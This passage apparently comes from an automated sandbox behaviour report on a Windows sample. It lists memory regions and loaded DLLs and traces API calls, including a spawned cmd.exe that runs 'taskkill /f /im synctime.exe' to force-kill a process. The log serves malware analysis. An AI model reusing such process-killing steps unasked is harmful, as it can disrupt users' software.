0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2056 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2057 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2058 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2059 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2060 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2061 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2062 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2063 start_va = 0x41d0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 2064 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2065 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2066 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2067 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2068 start_va = 0x4400000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2069 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2070 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2071 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2072 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2073 start_va = 0x4530000 end_va = 0x45edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2074 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2075 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2076 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2077 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 2078 start_va = 0x4170000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 2079 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2080 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2081 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2082 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2083 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2084 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2085 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2086 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2087 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2088 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2089 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2090 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2091 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2092 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2093 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2094 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2095 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2096 start_va = 0x41b0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 2097 start_va = 0x4400000 end_va = 0x4429fff monitored = 0 entry_point = 0x4405680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2098 start_va = 0x4430000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 2099 start_va = 0x45f0000 end_va = 0x4777fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Region: id = 2100 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2101 start_va = 0x4780000 end_va = 0x4900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 2102 start_va = 0x4910000 end_va = 0x5d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 2103 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2104 start_va = 0x41b0000 end_va = 0x41b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041b0000" filename = "" Region: id = 2105 start_va = 0x41c0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 2106 start_va = 0x41e0000 end_va = 0x41e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2107 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 2108 start_va = 0x4400000 end_va = 0x4400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2109 start_va = 0x5d10000 end_va = 0x6046fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2110 start_va = 0x6050000 end_va = 0x6139fff monitored = 0 entry_point = 0x608d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2111 start_va = 0x4410000 end_va = 0x4413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 2112 start_va = 0x6050000 end_va = 0x612ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2113 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2114 start_va = 0x4420000 end_va = 0x4420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004420000" filename = "" Region: id = 2115 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2116 start_va = 0x6130000 end_va = 0x6130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006130000" filename = "" Region: id = 2117 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2118 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2119 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2120 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2121 start_va = 0x6140000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 2122 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 2123 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 2124 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 2125 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 2126 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2127 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2128 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2130 start_va = 0x62c0000 end_va = 0x62c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000062c0000" filename = "" Thread: id = 170 os_tid = 0xc60 Thread: id = 171 os_tid = 0x4d8 Thread: id = 172 os_tid = 0xef0 Thread: id = 173 os_tid = 0xb68 Thread: id = 174 os_tid = 0x13c4 Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x32a3a000" os_pid = "0x1018" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im synctime.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2132 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2133 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2134 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2135 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2136 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2137 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2138 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2139 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2140 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2141 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2142 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2143 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2144 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2145 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2146 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2147 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2148 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2149 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2150 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2151 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2152 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2153 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2154 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2155 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2156 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2157 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2158 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2159 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2160 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2161 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2162 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2163 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2164 start_va = 0x740000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2165 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2166 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2167 start_va = 0x820000 end_va = 0xb56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 175 os_tid = 0xb58 [0159.708] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0159.708] __set_app_type (_Type=0x1) [0159.708] __p__fmode () returned 0x74974d6c [0159.708] __p__commode () returned 0x74975b1c [0159.708] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0159.709] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0159.709] GetCurrentThreadId () returned 0xb58 [0159.709] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb58) returned 0x78 [0159.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0159.709] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0159.710] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.733] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.733] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0159.734] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.734] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0159.734] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0159.734] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.734] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.734] GetConsoleOutputCP () returned 0x1b5 [0159.739] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0159.739] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0159.739] _get_osfhandle (_FileHandle=1) returned 0x144 [0159.739] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0159.739] _get_osfhandle (_FileHandle=1) returned 0x144 [0159.739] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0159.739] _get_osfhandle (_FileHandle=0) returned 0x140 [0159.739] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0159.740] GetEnvironmentStringsW () returned 0x447cc0* [0159.740] GetProcessHeap () returned 0x440000 [0159.740] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa1a) returned 0x4486e8 [0159.740] FreeEnvironmentStringsA (penv="A") returned 1 [0159.740] GetProcessHeap () returned 0x440000 [0159.740] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x440550 [0159.740] GetEnvironmentStringsW () returned 0x447cc0* [0159.740] GetProcessHeap () returned 0x440000 [0159.740] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa1a) returned 0x449110 [0159.740] FreeEnvironmentStringsA (penv="A") returned 1 [0159.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, 